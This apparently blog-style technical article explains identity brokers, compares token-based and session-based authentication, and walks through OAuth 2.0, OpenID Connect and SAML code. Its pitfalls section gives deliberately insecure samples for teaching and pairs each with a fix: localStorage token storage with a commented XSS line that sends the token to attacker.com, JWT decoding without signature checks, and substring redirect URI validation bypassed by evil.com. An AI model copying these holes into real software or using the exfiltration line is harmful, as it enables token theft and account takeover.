Identity Broker: Centralizing Authentication in Distributed Systems

Created 2021-12-24 Updated 2025-11-15

Understanding Identity Brokers
Token-Based vs Session-Based Authentication
Protocol Choices: OAuth 2.0, SAML, and OpenID Connect
Common Pitfalls and Security Issues
Conclusion

Identity brokers emerged as a solution to authentication sprawl in distributed systems. Rather than each application managing its own user credentials and authentication logic, an identity broker centralizes these concerns, providing single sign-on (SSO) and unified identity management. However, this centralization introduces new architectural challenges: session management complexity, single points of failure, and the delicate balance between security and user experience.

This exploration examines identity broker patterns across enterprise systems, cloud applications, and microservices architectures. We’ll dissect common implementation approaches, evaluate protocol choices between OAuth 2.0, SAML, and OpenID Connect, and understand the trade-offs between token-based and session-based authentication. Drawing from real-world implementations and security incidents, we uncover why identity brokers are both essential and complex.

Understanding Identity Brokers

Before diving into implementation patterns, understanding what identity brokers do and why they exist is essential. An identity broker sits between your applications and identity providers, translating authentication protocols and managing user sessions.

The Core Problem: Authentication Sprawl

Without an identity broker, each application manages authentication independently:

🚫 Problems Without Identity Brokers

Credential Duplication

Users maintain separate credentials for each application
Password reuse across systems creates security risks
Password reset requires contacting each application
No unified password policy enforcement

Integration Complexity

Each application implements its own authentication
Multiple integrations with identity providers
Inconsistent security implementations
Difficult to add new identity providers

User Experience Issues

Users log in separately to each application
No single sign-on across systems
Session management inconsistencies
Logout doesn't propagate across applications

Identity brokers solve these problems by centralizing authentication logic and providing a unified interface to applications.

What Identity Brokers Provide

An identity broker acts as an intermediary between applications and identity providers:

🔑 Identity Broker Capabilities

Protocol Translation

Applications use one protocol (e.g., OAuth 2.0)
Identity providers use different protocols (SAML, LDAP, OAuth)
Broker translates between protocols
Applications don't need provider-specific code

Single Sign-On (SSO)

Users authenticate once with the broker
Broker issues tokens/sessions to applications
Applications trust the broker's authentication
Seamless access across multiple applications

Identity Federation

Connect multiple identity providers
Users can authenticate with corporate AD, Google, GitHub, etc.
Broker normalizes user attributes
Unified identity across providers

Session Management

Centralized session tracking
Single logout across all applications
Session timeout policies
Concurrent session control

Popular identity brokers include Keycloak, Auth0, Okta, Azure AD, and AWS Cognito.

Token-Based vs Session-Based Authentication

Identity brokers can implement authentication using tokens or sessions, each with distinct trade-offs.

Token-Based Authentication: Stateless and Scalable

Token-based authentication uses cryptographically signed tokens (typically JWTs) to represent authenticated users:

# Token-based authentication flow
from jose import jwt
from datetime import datetime, timedelta

class TokenAuthBroker:
    def __init__(self, secret_key):
        self.secret_key = secret_key
    
    def authenticate(self, username, password):
        # Verify credentials with identity provider
        if self.verify_credentials(username, password):
            # Issue JWT token
            payload = {
                'sub': username,
                'iat': datetime.utcnow(),
                'exp': datetime.utcnow() + timedelta(hours=1),
                'roles': self.get_user_roles(username)
            }
            token = jwt.encode(payload, self.secret_key, algorithm='HS256')
            return token
        return None
    
    def validate_token(self, token):
        try:
            payload = jwt.decode(token, self.secret_key, algorithms=['HS256'])
            return payload
        except jwt.ExpiredSignatureError:
            return None
        except jwt.JWTError:
            return None

# Application validates tokens without contacting broker
def protected_endpoint(request):
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    payload = broker.validate_token(token)
    
    if payload:
        return f"Welcome {payload['sub']}"
    return "Unauthorized", 401

✅ Token-Based Advantages

Stateless Architecture

No server-side session storage required
Applications validate tokens independently
Horizontal scaling without session replication
No session affinity needed in load balancers

Performance

No database lookup for each request
Validation is cryptographic signature check
Reduced latency for authentication checks
Lower load on identity broker

Microservices Friendly

Tokens passed between services
No shared session store required
Services validate tokens independently
Decoupled architecture

However, token-based authentication has significant drawbacks:

⚠️ Token-Based Challenges

Revocation Difficulty

Tokens valid until expiration
Cannot immediately revoke compromised tokens
Logout doesn't invalidate existing tokens
Requires token blacklist (defeats stateless benefit)

Token Size

JWTs contain user data and claims
Sent with every request
Larger than session IDs
Bandwidth overhead for mobile clients

Security Risks

Tokens stored in browser (XSS vulnerability)
Long-lived tokens increase exposure window
Token theft allows impersonation until expiration
Refresh token management complexity

Session-Based Authentication: Stateful but Controllable

Session-based authentication uses server-side sessions with session IDs sent to clients:

# Session-based authentication flow
import secrets
from datetime import datetime, timedelta

class SessionAuthBroker:
    def __init__(self):
        self.sessions = {}  # In production: Redis, database
    
    def authenticate(self, username, password):
        # Verify credentials with identity provider
        if self.verify_credentials(username, password):
            # Create session
            session_id = secrets.token_urlsafe(32)
            self.sessions[session_id] = {
                'username': username,
                'created': datetime.utcnow(),
                'expires': datetime.utcnow() + timedelta(hours=1),
                'roles': self.get_user_roles(username)
            }
            return session_id
        return None
    
    def validate_session(self, session_id):
        session = self.sessions.get(session_id)
        if session and session['expires'] > datetime.utcnow():
            return session
        return None
    
    def revoke_session(self, session_id):
        # Immediate revocation
        if session_id in self.sessions:
            del self.sessions[session_id]
            return True
        return False

# Application checks session with broker
def protected_endpoint(request):
    session_id = request.cookies.get('session_id')
    session = broker.validate_session(session_id)
    
    if session:
        return f"Welcome {session['username']}"
    return "Unauthorized", 401

✅ Session-Based Advantages

Immediate Revocation

Sessions stored server-side
Logout immediately invalidates session
Compromised sessions can be revoked instantly
Fine-grained session control

Smaller Client Storage

Only session ID sent to client
Minimal bandwidth overhead
User data stored server-side
Reduced XSS exposure

Flexible Session Management

Update session data without client changes
Track session activity and location
Implement concurrent session limits
Rich session metadata

Session-based authentication also has trade-offs:

⚠️ Session-Based Challenges

Scalability Complexity

Requires shared session store (Redis, database)
Session replication across servers
Load balancer session affinity or sticky sessions
Horizontal scaling more complex

Performance Overhead

Database lookup for each request
Network latency to session store
Higher load on identity broker
Potential bottleneck at scale

Distributed System Challenges

Microservices must call broker for validation
Network dependency for each request
Increased latency in service chains
Broker becomes critical dependency

Hybrid Approach: Short-Lived Tokens with Refresh Tokens

Many modern systems use a hybrid approach combining benefits of both:

# Hybrid authentication with access and refresh tokens
class HybridAuthBroker:
    def __init__(self, secret_key):
        self.secret_key = secret_key
        self.refresh_tokens = {}  # Server-side refresh token store
    
    def authenticate(self, username, password):
        if self.verify_credentials(username, password):
            # Short-lived access token (15 minutes)
            access_token = jwt.encode({
                'sub': username,
                'exp': datetime.utcnow() + timedelta(minutes=15),
                'type': 'access'
            }, self.secret_key, algorithm='HS256')
            
            # Long-lived refresh token (7 days) stored server-side
            refresh_token = secrets.token_urlsafe(32)
            self.refresh_tokens[refresh_token] = {
                'username': username,
                'expires': datetime.utcnow() + timedelta(days=7)
            }
            
            return {
                'access_token': access_token,
                'refresh_token': refresh_token,
                'expires_in': 900  # 15 minutes
            }
        return None
    
    def refresh_access_token(self, refresh_token):
        # Validate refresh token (server-side check)
        token_data = self.refresh_tokens.get(refresh_token)
        if token_data and token_data['expires'] > datetime.utcnow():
            # Issue new access token
            access_token = jwt.encode({
                'sub': token_data['username'],
                'exp': datetime.utcnow() + timedelta(minutes=15),
                'type': 'access'
            }, self.secret_key, algorithm='HS256')
            return access_token
        return None
    
    def logout(self, refresh_token):
        # Revoke refresh token
        if refresh_token in self.refresh_tokens:
            del self.refresh_tokens[refresh_token]

🎯 Hybrid Approach Benefits

Balanced Security

Short-lived access tokens limit exposure window
Compromised access token expires quickly
Refresh tokens can be revoked immediately
Logout invalidates refresh token

Performance and Scalability

Access tokens validated locally (stateless)
Refresh token checks infrequent (every 15 minutes)
Reduced load on identity broker
Scalable like token-based auth

User Experience

Seamless token refresh in background
No frequent re-authentication
Logout works immediately
Balance between security and convenience

This hybrid approach is used by OAuth 2.0 and OpenID Connect, representing industry best practices.

Protocol Choices: OAuth 2.0, SAML, and OpenID Connect

Identity brokers must support various authentication protocols. Understanding their differences is crucial for implementation decisions.

OAuth 2.0: Authorization Framework

OAuth 2.0 is an authorization framework, not an authentication protocol, though often used for both:

# OAuth 2.0 Authorization Code Flow
from flask import Flask, request, redirect
import requests

app = Flask(__name__)

BROKER_AUTH_URL = 'https://broker.example.com/oauth/authorize'
BROKER_TOKEN_URL = 'https://broker.example.com/oauth/token'
CLIENT_ID = 'your_client_id'
CLIENT_SECRET = 'your_client_secret'
REDIRECT_URI = 'https://app.example.com/callback'

@app.route('/login')
def login():
    # Redirect user to identity broker
    auth_url = f"{BROKER_AUTH_URL}?client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}&response_type=code&scope=openid profile email"
    return redirect(auth_url)

@app.route('/callback')
def callback():
    # Broker redirects back with authorization code
    code = request.args.get('code')
    
    # Exchange code for access token
    token_response = requests.post(BROKER_TOKEN_URL, data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    })
    
    tokens = token_response.json()
    access_token = tokens['access_token']
    
    # Use access token to get user info
    user_response = requests.get(
        'https://broker.example.com/userinfo',
        headers={'Authorization': f'Bearer {access_token}'}
    )
    
    user_info = user_response.json()
    # Create application session with user_info
    return f"Welcome {user_info['name']}"

📋 OAuth 2.0 Characteristics

Designed For

Delegated authorization
Third-party API access
Mobile and web applications
Modern REST APIs

Advantages

Simple HTTP-based protocol
Wide industry adoption
Mobile-friendly
Flexible grant types

Limitations

Not designed for authentication
No standard user info format
Requires additional profile endpoint
Token format not standardized

OpenID Connect: Authentication Layer on OAuth 2.0

OpenID Connect (OIDC) extends OAuth 2.0 specifically for authentication:

# OpenID Connect adds ID token to OAuth 2.0 flow
from jose import jwt

@app.route('/oidc-callback')
def oidc_callback():
    code = request.args.get('code')
    
    # Exchange code for tokens
    token_response = requests.post(BROKER_TOKEN_URL, data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    })
    
    tokens = token_response.json()
    id_token = tokens['id_token']  # OIDC adds ID token
    access_token = tokens['access_token']
    
    # Validate and decode ID token
    # ID token contains user identity claims
    user_claims = jwt.decode(
        id_token,
        key=get_broker_public_key(),
        algorithms=['RS256'],
        audience=CLIENT_ID
    )
    
    # ID token contains: sub, name, email, etc.
    return f"Welcome {user_claims['name']} ({user_claims['email']})"

✅ OpenID Connect Advantages

Purpose-Built for Authentication

ID token contains user identity
Standardized user claims
No additional profile endpoint needed
Clear authentication semantics

Security Features

ID token is signed JWT
Cryptographic validation
Audience and issuer validation
Nonce for replay protection

Industry Standard

Supported by all major identity providers
Extensive library support
Well-documented specifications
Active development and updates

SAML 2.0: Enterprise Standard

SAML (Security Assertion Markup Language) is the traditional enterprise authentication protocol:

# SAML 2.0 authentication flow (simplified)
from lxml import etree
from signxml import XMLVerifier

@app.route('/saml/login')
def saml_login():
    # Generate SAML authentication request
    saml_request = f"""
    <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                        ID="{generate_request_id()}"
                        Version="2.0"
                        IssueInstant="{datetime.utcnow().isoformat()}Z"
                        Destination="{BROKER_SSO_URL}">
        <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
            {SERVICE_PROVIDER_ID}
        </saml:Issuer>
    </samlp:AuthnRequest>
    """
    
    # Encode and redirect to identity broker
    encoded_request = base64.b64encode(saml_request.encode()).decode()
    sso_url = f"{BROKER_SSO_URL}?SAMLRequest={encoded_request}"
    return redirect(sso_url)

@app.route('/saml/acs', methods=['POST'])
def saml_assertion_consumer():
    # Broker posts SAML response back
    saml_response = request.form['SAMLResponse']
    decoded_response = base64.b64decode(saml_response)
    
    # Validate SAML assertion signature
    xml_doc = etree.fromstring(decoded_response)
    verified_data = XMLVerifier().verify(
        xml_doc,
        x509_cert=get_broker_certificate()
    ).signed_xml
    
    # Extract user attributes from assertion
    nameid = xml_doc.find('.//{urn:oasis:names:tc:SAML:2.0:assertion}NameID').text
    attributes = extract_saml_attributes(xml_doc)
    
    return f"Welcome {attributes['name']}"

🏢 SAML Characteristics

Designed For

Enterprise single sign-on
Federation between organizations
Legacy enterprise systems
Strong security requirements

Advantages

Mature and battle-tested
Rich attribute exchange
Strong security features
Enterprise adoption

Disadvantages

XML-based (verbose and complex)
Not mobile-friendly
Steep learning curve
Limited modern tooling

Protocol Selection Guide

🎯 Choosing the Right Protocol

Use OpenID Connect When:

Building new applications
Need mobile support
Want modern REST APIs
Require simple integration
Target consumer users

Use SAML When:

Integrating with enterprise systems
Required by corporate IT policies
Need rich attribute exchange
Federation with other organizations
Legacy system compatibility required

Use OAuth 2.0 When:

Need API authorization (not authentication)
Third-party access to resources
Delegated permissions
Combined with OIDC for authentication

Modern identity brokers like Keycloak support all three protocols, allowing applications to choose based on their needs.

Common Pitfalls and Security Issues

Identity broker implementations often suffer from common security vulnerabilities and design mistakes.

Pitfall 1: Storing Tokens in Local Storage

Many applications store tokens in browser local storage, creating XSS vulnerabilities:

// ❌ INSECURE: Storing tokens in local storage
function login(username, password) {
    fetch('/api/login', {
        method: 'POST',
        body: JSON.stringify({ username, password })
    })
    .then(res => res.json())
    .then(data => {
        // Vulnerable to XSS attacks
        localStorage.setItem('access_token', data.access_token);
        localStorage.setItem('refresh_token', data.refresh_token);
    });
}

// Any XSS vulnerability can steal tokens
// <script>
//   fetch('https://attacker.com/steal?token=' + localStorage.getItem('access_token'));
// </script>

🚫 Local Storage Vulnerabilities

XSS Attack Vector

JavaScript can access local storage
Any XSS vulnerability exposes tokens
Third-party scripts can steal tokens
No protection against script injection

Impact

Complete account takeover
Tokens valid until expiration
Attacker can impersonate user
Difficult to detect theft

Better approach using HTTP-only cookies:

// ✅ SECURE: Using HTTP-only cookies
// Server sets HTTP-only cookie (JavaScript cannot access)
@app.route('/api/login', methods=['POST'])
def login():
    data = request.json
    tokens = broker.authenticate(data['username'], data['password'])
    
    response = make_response({'status': 'success'})
    
    # HTTP-only cookie prevents JavaScript access
    response.set_cookie(
        'access_token',
        tokens['access_token'],
        httponly=True,  # Prevents JavaScript access
        secure=True,    # HTTPS only
        samesite='Strict'  # CSRF protection
    )
    
    return response

// Client-side: No token handling needed
function login(username, password) {
    fetch('/api/login', {
        method: 'POST',
        credentials: 'include',  // Send cookies
        body: JSON.stringify({ username, password })
    });
}

Pitfall 2: Missing Token Validation

Applications sometimes skip proper token validation:

# ❌ INSECURE: Trusting token without validation
@app.route('/api/user')
def get_user():
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    
    # Decoding without verification!
    payload = jwt.decode(token, options={"verify_signature": False})
    
    return {'user': payload['sub']}  # Attacker can forge tokens!

🚫 Validation Failures

Missing Signature Verification

Attacker can create fake tokens
No cryptographic validation
Complete authentication bypass

Missing Expiration Check

Expired tokens still accepted
Stolen tokens valid indefinitely
No time-based security

Missing Audience Validation

Tokens from other applications accepted
Cross-application token reuse
Privilege escalation risks

Proper token validation:

# ✅ SECURE: Complete token validation
from jose import jwt, JWTError

@app.route('/api/user')
def get_user():
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    
    try:
        payload = jwt.decode(
            token,
            key=get_public_key(),
            algorithms=['RS256'],  # Specify allowed algorithms
            audience='my-application',  # Validate audience
            issuer='https://broker.example.com'  # Validate issuer
        )
        
        # Token is valid and verified
        return {'user': payload['sub']}
        
    except jwt.ExpiredSignatureError:
        return {'error': 'Token expired'}, 401
    except jwt.JWTClaimsError:
        return {'error': 'Invalid claims'}, 401
    except JWTError:
        return {'error': 'Invalid token'}, 401

Pitfall 3: Insecure Redirect URIs

OAuth 2.0 redirect URI validation is critical for security:

# ❌ INSECURE: Weak redirect URI validation
@app.route('/oauth/authorize')
def authorize():
    client_id = request.args.get('client_id')
    redirect_uri = request.args.get('redirect_uri')
    
    # Weak validation: substring match
    if 'example.com' in redirect_uri:
        # Generate authorization code
        code = generate_auth_code(client_id)
        return redirect(f"{redirect_uri}?code={code}")
    
    return "Invalid redirect URI", 400

# Attacker can use: https://evil.com?victim=example.com
# Validation passes, code sent to attacker!

🚫 Redirect URI Vulnerabilities

Open Redirect

Authorization codes sent to attacker
Account takeover possible
Phishing attacks enabled

Subdomain Attacks

Weak validation allows subdomains
Attacker registers malicious subdomain
Steals authorization codes

Secure redirect URI validation:

# ✅ SECURE: Strict redirect URI validation
REGISTERED_CLIENTS = {
    'client123': {
        'redirect_uris': [
            'https://app.example.com/callback',
            'https://app.example.com/oauth/callback'
        ]
    }
}

@app.route('/oauth/authorize')
def authorize():
    client_id = request.args.get('client_id')
    redirect_uri = request.args.get('redirect_uri')
    
    # Exact match against registered URIs
    client = REGISTERED_CLIENTS.get(client_id)
    if not client or redirect_uri not in client['redirect_uris']:
        return "Invalid redirect URI", 400
    
    code = generate_auth_code(client_id)
    return redirect(f"{redirect_uri}?code={code}")

Conclusion

Identity brokers centralize authentication in distributed systems, providing single sign-on, protocol translation, and unified identity management. However, implementation choices significantly impact security, performance, and user experience.

The choice between token-based and session-based authentication involves fundamental trade-offs. Token-based authentication offers stateless scalability and microservices compatibility but struggles with revocation and security risks. Session-based authentication provides immediate revocation and fine-grained control but introduces scalability complexity. The hybrid approach using short-lived access tokens with server-side refresh tokens represents industry best practices, balancing security, performance, and user experience.

Protocol selection depends on your environment and requirements. OpenID Connect is the modern standard for new applications, offering simple integration, mobile support, and purpose-built authentication. SAML remains essential for enterprise integration and legacy systems despite its complexity. OAuth 2.0 serves authorization needs but requires OpenID Connect for proper authentication.

Common pitfalls plague identity broker implementations. Storing tokens in local storage creates XSS vulnerabilities—use HTTP-only cookies instead. Missing token validation allows attackers to forge tokens—always verify signatures, expiration, audience, and issuer. Weak redirect URI validation enables authorization code theft—use exact matching against registered URIs.

Identity brokers are essential infrastructure for modern distributed systems, but they require careful implementation. Understanding the trade-offs between authentication approaches, choosing appropriate protocols, and avoiding common security pitfalls ensures your identity broker enhances rather than undermines your security posture. The complexity is justified by the benefits: unified authentication, improved user experience, and centralized security controls across your entire application ecosystem.

Decoding Digital Anomalies

Sometimes the feature is the bug in the digital rabbit hole, and vice versa

Development